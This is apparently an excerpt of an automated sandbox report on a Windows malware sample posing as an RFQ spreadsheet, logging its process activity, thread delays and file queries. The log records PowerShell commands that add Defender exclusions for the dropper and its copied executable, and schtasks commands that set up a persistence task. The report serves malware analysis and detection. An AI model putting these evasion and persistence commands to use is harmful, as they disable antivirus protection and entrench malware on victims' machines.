                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199250
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199125
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199015
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198906
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198796
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198687
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198578
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198468
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198359
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198250
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198140
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198031
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197921
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197812
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197703
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197593
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197484
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197373
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197265
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197156
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197046
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196937
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196828
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196718
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196609
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196500
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196390
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196281
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196171
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196060
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195951
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195843
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195734
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195624
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195515
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195406
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195296
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195187
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195078
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194954
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194730
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194598
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194308
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194202
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194093
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1193982
                      Source: ywKDUBCUA.exe, 00000010.00000002.3265209027.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllf$
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2070955375.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wHGfSH4OfX
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3266474447.0000000001629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Process created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe VolumeInformation
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
